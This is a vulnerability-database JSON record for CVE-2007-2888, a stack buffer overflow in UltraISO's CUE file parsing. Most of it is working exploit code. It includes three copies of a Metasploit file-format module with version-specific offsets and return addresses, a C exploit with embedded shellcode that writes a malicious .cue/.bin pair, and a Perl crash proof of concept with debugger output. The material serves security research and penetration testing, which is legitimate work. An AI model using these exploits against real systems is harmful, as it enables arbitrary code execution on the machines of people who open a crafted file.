{"id": "EDB-ID:16627", "hash": "c3e247596045b4ad4ed816fcb215759f", "type": "exploitdb", "bulletinFamily": "exploit", "title": "UltraISO CUE File Parsing Buffer Overflow", "description": "UltraISO CUE File Parsing Buffer Overflow. CVE-2007-2888. Local exploit for windows platform", "published": "2010-04-30T00:00:00", "modified": "2010-04-30T00:00:00", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/16627/", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2007-2888"], "lastseen": "2016-02-02T06:07:08", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/16627/", "sourceData": "##\r\n# $Id: ultraiso_cue.rb 9179 2010-04-30 08:40:19Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'UltraISO CUE File Parsing Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack-based buffer overflow in EZB Systems, Inc's\r\n\t\t\t\tUltraISO. When processing .CUE files, data is read from file into a\r\n\t\t\t\tfixed-size stack buffer. Since no bounds checking is done, a buffer overflow\r\n\t\t\t\tcan occur. Attackers can execute arbitrary code by convincing their victim\r\n\t\t\t\tto open an CUE file.\r\n\r\n\t\t\t\tNOTE: A file with the same base name, but the extension of \"bin\" must also\r\n\t\t\t\texist. Opening either file will trigger the vulnerability, but the files must\r\n\t\t\t\tboth exist.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' \t =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'n00b', # original discovery\r\n\t\t\t\t\t'jduck' # metasploit version\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 9179 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-2888' ],\r\n\t\t\t\t\t[ 'OSVDB', '36570' ],\r\n\t\t\t\t\t[ 'BID', '24140' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.exploit-db.com/exploits/3978' ]\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x22\",\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# BOF @ 0x005e1f8b\r\n\r\n\t\t\t\t\t# The EXE base addr contains a bad char (nul). This prevents us from\r\n\t\t\t\t\t# writing data after the return address. NOTE: An SEH exploit was\r\n\t\t\t\t\t# originally created for this vuln, but was tossed in favor of using\r\n\t\t\t\t\t# the return address method instead. This is due to the offset being\r\n\t\t\t\t\t# stable across different open methods.\r\n\r\n\t\t\t\t\t[ 'Windows - UltraISO v8.6.2.2011 portable',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 1100,\r\n\t\t\t\t\t\t\t'JmpOff' => 0x30, # offset from the end to our jmp\r\n\t\t\t\t\t\t\t'Ret' => 0x00594740 # add esp, 0x64 / p/p/p/r in unpacked UltraISO.exe\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Windows - UltraISO v8.6.0.1936',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 1100,\r\n\t\t\t\t\t\t\t'JmpOff' => 0x30, # offset from the end to our jmp\r\n\t\t\t\t\t\t\t'Ret' => 0x0059170c # add esp, 0x64 / p/p/p/r in unpacked UltraISO.exe\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'May 24 2007',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [ true, 'The file name.', 'msf.cue']),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\toff = target['Offset']\r\n\t\tjmpoff = target['JmpOff']\r\n\r\n\t\tsploit = \"\\\"\"\r\n\t\tsploit << payload.encoded\r\n\t\tsploit << rand_text_alphanumeric(off - sploit.length)\r\n\r\n\t\t# Smashed return address..\r\n\t\tsploit[off, 4] = [target.ret].pack('V')\r\n\r\n\t\t# We utilize a single instruction near the end of the buffer space to\r\n\t\t# jump back to the beginning of the buffer..\r\n\t\tdistance = off - jmpoff\r\n\t\tdistance -= 1 # dont execute the quote character!\r\n\t\tjmp = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string\r\n\t\tsploit[off - jmpoff, jmp.length] = jmp\r\n\r\n\t\tsploit << \".BIN\\\"\"\r\n\r\n\t\tcue_data = \"FILE \"\r\n\t\tcue_data << sploit\r\n\t\tcue_data << \" BINARY\\r\\n\"\r\n\t\tcue_data << \" TRACK 01 MODE1/2352\\r\\n\"\r\n\t\tcue_data << \" INDEX 01 00:00:00\\r\\n\"\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' using target '#{target.name}' ...\")\r\n\t\tfile_create(cue_data)\r\n\r\n\t\t# create the empty BIN file\r\n\t\tbinfn = datastore['FILENAME'].dup\r\n\t\tbinfn.gsub!(/\\.cue$/, '.bin')\r\n\t\tout = File.expand_path(File.join(datastore['OUTPUTPATH'], binfn))\r\n\t\tFile.new(out,\"wb\").close\r\n\t\tprint_status(\"Created empty output file #{out}\")\r\n\r\n\tend\r\n\r\nend\r\n", "osvdbidlist": ["36570"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2017-10-11T11:07:10", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/34485", "http://www.securityfocus.com/bid/24140", "https://www.exploit-db.com/exploits/3978"], "description": "Stack-based buffer overflow in UltraISO 8.6.2.2011 and earlier allows user-assisted remote attackers to execute arbitrary code via a long FILE string (filename) in a .cue file, a related issue to CVE-2007-2761. NOTE: some details are obtained from third party information.", "edition": 3, "reporter": "NVD", "published": "2007-05-29T21:30:00", "title": "CVE-2007-2888", "type": "cve", "enchantments": {"score": {"modified": "2017-10-11T11:07:10", "vector": "NONE", "value": 9.3}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2007-2888"], "scanner": [], "modified": "2017-10-10T21:32:26", "cpe": ["cpe:/a:ezb_systems:ultraiso:8.6.2.2011"], "id": "CVE-2007-2888", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2888", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:32", "references": [], "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:25384](https://secuniaresearch.flexerasoftware.com/advisories/25384/)\nISS X-Force ID: 34485\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3978\n[CVE-2007-2888](https://vulners.com/cve/CVE-2007-2888)\nBugtraq ID: 24140\n", "edition": 1, "reporter": "OSVDB", "published": "2007-05-24T13:33:47", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "title": "UltraISO CUE File Parsing FILE String Overflow", "type": "osvdb", "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2007-2888"], "modified": "2007-05-24T13:33:47", "href": "https://vulners.com/osvdb/OSVDB:36570", "id": "OSVDB:36570", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-01-31T19:52:52", "osvdbidlist": ["36570"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "UltraISO <= 8.6.2.2011 (Cue/Bin Files) Local Buffer Overflow Exploit. CVE-2007-2888. Local exploit for windows platform", "reporter": "n00b", "published": "2007-05-28T00:00:00", "type": "exploitdb", "title": "UltraISO <= 8.6.2.2011 Cue/Bin Files Local Buffer Overflow Exploit", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2007-2888"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2007-05-28T00:00:00", "id": "EDB-ID:4001", "href": "https://www.exploit-db.com/exploits/4001/", "sourceData": "/*\nDate : May 28th 2007.\nUltraISO <= 8.6.2.2011 local buffer-over flow by n00b\nYou might need to change the jmp esp% adress to your version.\nTested on win xp service pack 2 <eng> executes calc.Don't\nforget you need to have the bin and cue file in the same \nDirectory special thanks to Thomas Pollet also.\n\n*/\n\n#include <stdlib.h>\n#include <stdio.h>\n\n//Calc shell_code\nunsigned char shell_code[] =\n\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\" \n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\"\n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\"\n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\" \n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x54\"\n\"\\x42\\x50\\x42\\x50\\x42\\x30\\x4b\\x58\\x45\\x54\\x4e\\x33\\x4b\\x38\\x4e\\x57\"\n\"\\x45\\x30\\x4a\\x37\\x41\\x30\\x4f\\x4e\\x4b\\x58\\x4f\\x44\\x4a\\x41\\x4b\\x38\" \n\"\\x4f\\x35\\x42\\x42\\x41\\x30\\x4b\\x4e\\x49\\x34\\x4b\\x58\\x46\\x33\\x4b\\x58\"\n\"\\x41\\x30\\x50\\x4e\\x41\\x33\\x42\\x4c\\x49\\x39\\x4e\\x4a\\x46\\x58\\x42\\x4c\"\n\"\\x46\\x37\\x47\\x30\\x41\\x4c\\x4c\\x4c\\x4d\\x50\\x41\\x50\\x44\\x4c\\x4b\\x4e\" \n\"\\x46\\x4f\\x4b\\x53\\x46\\x55\\x46\\x32\\x46\\x30\\x45\\x47\\x45\\x4e\\x4b\\x48\"\n\"\\x4f\\x35\\x46\\x32\\x41\\x50\\x4b\\x4e\\x48\\x36\\x4b\\x58\\x4e\\x50\\x4b\\x54\"\n\"\\x4b\\x58\\x4f\\x35\\x4e\\x31\\x41\\x50\\x4b\\x4e\\x4b\\x38\\x4e\\x41\\x4b\\x38\" \n\"\\x41\\x30\\x4b\\x4e\\x49\\x38\\x4e\\x45\\x46\\x52\\x46\\x50\\x43\\x4c\\x41\\x53\"\n\"\\x42\\x4c\\x46\\x46\\x4b\\x48\\x42\\x44\\x42\\x43\\x45\\x38\\x42\\x4c\\x4a\\x37\"\n\"\\x4e\\x50\\x4b\\x48\\x42\\x44\\x4e\\x50\\x4b\\x48\\x42\\x57\\x4e\\x51\\x4d\\x4a\" \n\"\\x4b\\x48\\x4a\\x46\\x4a\\x30\\x4b\\x4e\\x49\\x30\\x4b\\x58\\x42\\x58\\x42\\x4b\"\n\"\\x42\\x30\\x42\\x50\\x42\\x30\\x4b\\x48\\x4a\\x46\\x4e\\x43\\x4f\\x55\\x41\\x43\"\n\"\\x48\\x4f\\x42\\x56\\x48\\x55\\x49\\x58\\x4a\\x4f\\x43\\x38\\x42\\x4c\\x4b\\x57\" \n\"\\x42\\x55\\x4a\\x46\\x4f\\x4e\\x50\\x4c\\x42\\x4e\\x42\\x46\\x4a\\x36\\x4a\\x49\"\n\"\\x50\\x4f\\x4c\\x48\\x50\\x30\\x47\\x35\\x4f\\x4f\\x47\\x4e\\x43\\x46\\x41\\x56\"\n\"\\x4e\\x46\\x43\\x56\\x50\\x42\\x45\\x56\\x4a\\x37\\x45\\x36\\x42\\x30\\x5a\" ;\n\nint main(int argc, char *argv[])\n{\n\tFILE *cue;\n\n\tFILE *bin;\n\n if(argc < 2) {\n \n system(\"cls\");\n printf(\"\\n *************************************************\");\n printf(\"\\n *************************************************\");\n printf(\"\\n * Ultra Iso local buffer over flow by n00b *\");\n printf(\"\\n *************************************************\");\n printf(\"\\n * Special thanks to Str0ke *\");\n printf(\"\\n *************************************************\");\n printf(\"\\n * Shout's ~ str0ke ~ c0ntex ~ marsu ~v9@fakehalo*\");\n printf(\"\\n * Date : May 28th 2007 *\");\n printf(\"\\n *************************************************\");\n printf(\"\\n * Credit's to n00b for finding this bug and poc *\");\n printf(\"\\n *************************************************\");\n printf(\"\\n Usage:> Exploit.cue Exploit.bin \");\n printf(\"\\n *************************************************\");\n\n\t\treturn 0;\n\t}\n if(!(cue = fopen(argv[1], \"w\"))) {\n\t\tprintf(\"[+] Error\");\n\t\treturn 0;\n\t}\n \n\tfputs(\"FILE \\\"\", cue);\n\tfor (int i=0;i<1099;i++) \\\n\tfputs(\"A\", cue);\n\tfputs(\"\\x43\\x41\\xf8\\x77\", cue); \n \n fputs((char *)shell_code, cue);\n fputs(\".bin \\\"\", cue);\n\tfputs(\"\\\" BINARY\\n\", cue);\n\tfputs(\" TRACK 01 MODE2/2352\\n\", cue);\n\tfputs(\" INDEX 01 00:00:00\\n\", cue);\n\t\n fclose(cue);\n \n if(!(bin = fopen(argv[2], \"w\"))) {\n\t\tprintf(\"[+] Error\");\n\t\treturn 0;\n\t}\n\n\tfputs(\"Fake bin file\\n\", bin);\n\tfclose(bin);\n\tprintf(\"File's successfully created\");\n\treturn 0;\n}\n\n// milw0rm.com [2007-05-28]\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/4001/"}, {"lastseen": "2016-01-31T19:45:00", "osvdbidlist": ["36570"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "UltraISO <= 8.6.2.2011 (Cue/Bin Files) Local Buffer Overflow PoC. CVE-2007-2888. Dos exploit for windows platform", "reporter": "n00b", "published": "2007-05-24T00:00:00", "type": "exploitdb", "title": "UltraISO <= 8.6.2.2011 Cue/Bin Files Local Buffer Overflow PoC", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2007-2888"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2007-05-24T00:00:00", "id": "EDB-ID:3978", "href": "https://www.exploit-db.com/exploits/3978/", "sourceData": "#!/usr/bin/perl\n############################################################\n#Credit:To n00b for finding this bug and writing poc.\n############################################################\n#Ultra ISO stack over flow poc code.\n#Ultra iso is exploitable via opening\n#a specially crafted Cue file..There is \n#A limitation that the user must have the bin \n#file in the same dir as the cue file.\n#This is the reason i have provided the \n#Bin file also Command execution is possible\n#As we can control $ebp and $eip hoooooha.\n#I will be working on the local exploit \n#as soon as i get a chance this should be a straight forward \n#to exploit this as we already gain control of the\n#$eip register..\n#Tested on :win xp service pack 2 \n#Vendor's web site: http://www.ezbsystems.com/ultraiso\n# Version affected: UltraISO 8.6.2.2011\n############################################################\n#Debug info as follows.\n#########################################\n#Program received signal SIGSEGV, Segmentation fault.\n#[Switching to thread 1696.0x6d0]\n#0x41414141 in ?? ()\n############################################################\n#(gdb) i r\n#eax 0x0 0\n#ecx 0x7ce2fc 8184572\n#edx 0x1 1\n#ebx 0xfe6468 16671848\n#esp 0x13ecf8 0x13ecf8\n#ebp 0x41414141 0x41414141\n#esi 0x0 0\n#edi 0x13fa18 1309208\n#eip 0x41414141 0x41414141\n#eflags 0x10246 66118\n#cs 0x1b 27\n#ss 0x23 35\n#ds 0x23 35\n#es 0x23 35\n#fs 0x3b 59\n#gs 0x0 0\n#fctrl 0xffff1273 -60813\n#fstat 0xffff0000 -65536\n#ftag 0xffffffff -1\n#fiseg 0x0 0\n#fioff 0x0 0\n#foseg 0xffff0000 -65536\n#fooff 0x0 0\n#---Type <return> to continue, or q <return> to quit---\n#fop 0x0 0\n#(gdb)\n############################################################\n\nprint \"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\";\nprint \"0day Ultra-Iso 8.6.2.2011 stack over flow poc \\n\";\nprint \"Credits to n00b for finding the bug and writing poc\\n\";\nprint \"I will be writing a local exploit for this in a few days\\n\";\nprint \"Shouts: - Str0ke - Marsu - SM - Aelphaeis - vade79 - c0ntex\\n\";\nprint \"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\";\n\nmy $CUEFILE=\"1.cue\"; # Do not edit this \n\nmy $BINFILE=\"1.bin\"; # Do not edit this \n\nmy $header= \"\\x46\\x49\\x4c\\x45\\x20\\x22\";\n\nmy $endheader= \"\\x2e\\x42\\x49\\x4e\\x22\\x20\\x42\\x49\\x4e\\x41\\x52\\x59\\x0d\\x0a\\x20\".\n \"\\x54\\x52\\x41\\x43\\x4b\\x20\\x30\\x31\\x20\\x4d\\x4f\\x44\\x45\\x31\\x2f\\x32\".\n \"\\x33\\x35\\x32\\x0d\\x0a\\x20\\x20\\x20\\x49\\x4e\\x44\\x45\\x58\\x20\\x30\\x31\".\n \"\\x20\\x30\\x30\\x3a\\x30\\x30\\x3a\\x30\\x30\";\n\nopen(CUE, \">$CUEFILE\") or die \"ERROR:$CUEFILE\\n\";\n\nopen(BIN, \">$BINFILE\") or die \"ERROR:$BINFILE\\n\";\n\nprint CUE $header;\n\nfor ($i = 0; $i < 1024; $i++) { # Fill our buffer\n$buffer.= \"\\x41\"; # For easy of debugging\n}\nprint CUE $buffer;\n\nfor ($i = 0; $i < 100; $i++) { # Fill our buffer\n$buffer2.= \"\\x90\"; # Fill our bin file with nops..Why not pmsl.\n}\nprint BIN $buffer2;\n\nprint CUE $endheader;\n\nclose(CUE,BIN);\n\nsleep(5);\n\nprint \"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\";\nprint \"Files have been created success-fully\\n\";\nprint \"Please note you will have to have both 1.cue and 1.bin in the same dir\\n\";\nprint \"To be able to reproduce the bug open the 1.cue file with ultra~iso\\n\";\nprint \"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\";\n\n# milw0rm.com [2007-05-24]\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/3978/"}], "packetstorm": [{"lastseen": "2016-12-05T22:11:58", "references": [], "edition": 1, "description": "", "reporter": "jduck", "published": "2010-03-30T00:00:00", "type": "packetstorm", "title": "UltraISO CUE File Parsing Buffer Overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2007-2888"], "modified": "2010-03-30T00:00:00", "href": "https://packetstormsecurity.com/files/87754/UltraISO-CUE-File-Parsing-Buffer-Overflow.html", "id": "PACKETSTORM:87754", "sourceData": "`## \n# $Id: ultraiso_cue.rb 8957 2010-03-30 01:40:26Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::FILEFORMAT \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'UltraISO CUE File Parsing Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack-based buffer overflow in EZB Systems, Inc's \nUltraISO. When processing .CUE files, data is read from file into a \nfixed-size stack buffer. Since no bounds checking is done, a buffer overflow \ncan occur. Attackers can execute arbitrary code by convincing their victim \nto open an CUE file. \n \nNOTE: A file with the same base name, but the extension of \"bin\" must also \nexist. Opening either file will trigger the vulnerability, but the files must \nboth exist. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ 'jduck' ], \n'Version' => '$Revision: 8957 $', \n'References' => \n[ \n[ 'CVE', '2007-2888' ], \n[ 'OSVDB', '36570' ], \n[ 'BID', '24140' ], \n[ 'URL', 'http://www.exploit-db.com/exploits/3978' ] \n], \n'Payload' => \n{ \n'Space' => 1024, \n'BadChars' => \"\\x00\\x0a\\x0d\\x22\", \n'DisableNops' => true, \n'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\", \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# BOF @ 0x005e1f8b \n \n# The EXE base addr contains a bad char (nul). This prevents us from \n# writing data after the return address. NOTE: An SEH exploit was \n# originally created for this vuln, but was tossed in favor of using \n# the return address method instead. This is due to the offset being \n# stable across different open methods. \n \n[ 'Windows - UltraISO v8.6.2.2011 portable', \n{ \n'Offset' => 1100, \n'JmpOff' => 0x30, # offset from the end to our jmp \n'Ret' => 0x00594740 # add esp, 0x64 / p/p/p/r in unpacked UltraISO.exe \n} \n], \n[ 'Windows - UltraISO v8.6.0.1936', \n{ \n'Offset' => 1100, \n'JmpOff' => 0x30, # offset from the end to our jmp \n'Ret' => 0x0059170c # add esp, 0x64 / p/p/p/r in unpacked UltraISO.exe \n} \n], \n], \n'Privileged' => false, \n'DisclosureDate' => 'May 24 2007', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ true, 'The file name.', 'msf.cue']), \n], self.class) \nend \n \ndef exploit \n \noff = target['Offset'] \njmpoff = target['JmpOff'] \n \nsploit = \"\\\"\" \nsploit << payload.encoded \nsploit << rand_text_alphanumeric(off - sploit.length) \n \n# Smashed return address.. \nsploit[off, 4] = [target.ret].pack('V') \n \n# We utilize a single instruction near the end of the buffer space to \n# jump back to the beginning of the buffer.. \ndistance = off - jmpoff \ndistance -= 1 # dont execute the quote character! \njmp = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string \nsploit[off - jmpoff, jmp.length] = jmp \n \nsploit << \".BIN\\\"\" \n \ncue_data = \"FILE \" \ncue_data << sploit \ncue_data << \" BINARY\\r\\n\" \ncue_data << \" TRACK 01 MODE1/2352\\r\\n\" \ncue_data << \" INDEX 01 00:00:00\\r\\n\" \n \nprint_status(\"Creating '#{datastore['FILENAME']}' using target '#{target.name}' ...\") \nfile_create(cue_data) \n \n# create the empty BIN file \nbinfn = datastore['FILENAME'].dup \nbinfn.gsub!(/\\.cue$/, '.bin') \nout = File.expand_path(File.join(datastore['OUTPUTPATH'], binfn)) \nFile.new(out,\"wb\").close \nprint_status(\"Created empty output file #{out}\") \n \nend \n \nend \n`\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/87754/ultraiso_cue.rb.txt"}], "metasploit": [{"lastseen": "2018-03-11T17:13:41", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "references": [], "description": "This module exploits a stack-based buffer overflow in EZB Systems, Inc's UltraISO. When processing .CUE files, data is read from file into a fixed-size stack buffer. Since no bounds checking is done, a buffer overflow can occur. Attackers can execute arbitrary code by convincing their victim to open an CUE file. NOTE: A file with the same base name, but the extension of \"bin\" must also exist. Opening either file will trigger the vulnerability, but the files must both exist.", "reporter": "Rapid7", "published": "2010-03-29T17:21:15", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/fileformat/ultraiso_cue.rb", "type": "metasploit", "title": "UltraISO CUE File Parsing Buffer Overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2007-2888"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-07-24T13:26:21", "metasploitReliability": "Great", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/ULTRAISO_CUE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::FILEFORMAT\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'UltraISO CUE File Parsing Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack-based buffer overflow in EZB Systems, Inc's\n UltraISO. When processing .CUE files, data is read from file into a\n fixed-size stack buffer. Since no bounds checking is done, a buffer overflow\n can occur. Attackers can execute arbitrary code by convincing their victim\n to open an CUE file.\n\n NOTE: A file with the same base name, but the extension of \"bin\" must also\n exist. Opening either file will trigger the vulnerability, but the files must\n both exist.\n },\n 'License' => MSF_LICENSE,\n 'Author' \t =>\n [\n 'n00b', # original discovery\n 'jduck' # metasploit version\n ],\n 'References' =>\n [\n [ 'CVE', '2007-2888' ],\n [ 'OSVDB', '36570' ],\n [ 'BID', '24140' ],\n [ 'EDB', '3978' ]\n ],\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x22\",\n 'DisableNops' => true,\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # BOF @ 0x005e1f8b\n\n # The EXE base addr contains a bad char (nul). This prevents us from\n # writing data after the return address. NOTE: An SEH exploit was\n # originally created for this vuln, but was tossed in favor of using\n # the return address method instead. This is due to the offset being\n # stable across different open methods.\n\n [ 'Windows - UltraISO v8.6.2.2011 portable',\n {\n 'Offset' => 1100,\n 'JmpOff' => 0x30, # offset from the end to our jmp\n 'Ret' => 0x00594740 # add esp, 0x64 / p/p/p/r in unpacked UltraISO.exe\n }\n ],\n [ 'Windows - UltraISO v8.6.0.1936',\n {\n 'Offset' => 1100,\n 'JmpOff' => 0x30, # offset from the end to our jmp\n 'Ret' => 0x0059170c # add esp, 0x64 / p/p/p/r in unpacked UltraISO.exe\n }\n ],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'May 24 2007',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ true, 'The file name.', 'msf.cue']),\n ])\n end\n\n def exploit\n\n off = target['Offset']\n jmpoff = target['JmpOff']\n\n sploit = \"\\\"\"\n sploit << payload.encoded\n sploit << rand_text_alphanumeric(off - sploit.length)\n\n # Smashed return address..\n sploit[off, 4] = [target.ret].pack('V')\n\n # We utilize a single instruction near the end of the buffer space to\n # jump back to the beginning of the buffer..\n distance = off - jmpoff\n distance -= 1 # dont execute the quote character!\n jmp = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string\n sploit[off - jmpoff, jmp.length] = jmp\n\n sploit << \".BIN\\\"\"\n\n cue_data = \"FILE \"\n cue_data << sploit\n cue_data << \" BINARY\\r\\n\"\n cue_data << \" TRACK 01 MODE1/2352\\r\\n\"\n cue_data << \" INDEX 01 00:00:00\\r\\n\"\n\n print_status(\"Creating '#{datastore['FILENAME']}' using target '#{target.name}' ...\")\n file_create(cue_data)\n\n # This extends the current class, and changes the file_format_name.\n # This allows us to use the file_create(data) to store the created\n # file in the correct directory.\n\n class << self\n def file_format_filename\n datastore['FILENAME'].gsub(/\\.cue$/, '.bin')\n end\n end\n\n file_create('')\n end\nend\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/ultraiso_cue.rb"}]}